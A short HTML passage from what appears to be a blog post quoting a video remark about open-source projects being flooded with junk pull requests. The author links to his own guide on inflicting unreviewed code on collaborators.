href="https://www.youtube.com/watch?v=owmJyKVu5f8&amp;t=1673s">27:53</a></p> <blockquote> <p>Projects are flooded with junk contributions to the point that people are trying to convince GitHub to disable pull requests, which is something GitHub have never done. That's been the whole fundamental value of GitHub—open collaboration and pull requests—and now people are saying, "We're just flooded by them, this doesn't work anymore."</p> </blockquote> <p>I wrote more about this problem in <a href="https://simonwillison.net/guides/agentic-engineering-patterns/anti-patterns/#inflicting-unreviewed-code-on-collaborators">Inflicting unreviewed code on collaborators</a>.</p>
Copy and export data

Duration: 65.04ms